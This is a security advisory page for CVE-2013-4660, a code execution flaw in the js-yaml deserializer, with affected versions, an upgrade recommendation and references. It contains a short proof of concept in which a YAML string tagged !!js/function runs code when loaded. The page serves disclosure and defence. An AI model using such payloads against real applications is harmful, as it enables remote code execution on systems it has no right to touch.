CVE-2013-4660

EPSS 64.5%

Deserialization Code Execution in js-yaml

Published: 10/24/2017Modified: 11/8/2023

Description

Versions 2.0.4 and earlier of `js-yaml` are affected by a code execution vulnerability in the YAML deserializer. ## Proof of Concept ``` const yaml = require('js-yaml'); const x = `test: !!js/function > function f() { console.log(1); }();` yaml.load(x); ``` ## Recommendation Update js-yaml to version 2.0.5 or later, and ensure that all instances where the `.load()` method is called are updated to use `.safeLoad()` instead.

Affected packages (1)

npm/js-yamlfrom 0, < 2.0.5

References (4)

ADVISORYhttps://github.com/advisories/GHSA-xxvw-45rp-3mj2
ADVISORYhttps://nvd.nist.gov/vuln/detail/CVE-2013-4660
WEBhttps://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module
WEBhttps://www.npmjs.com/advisories/16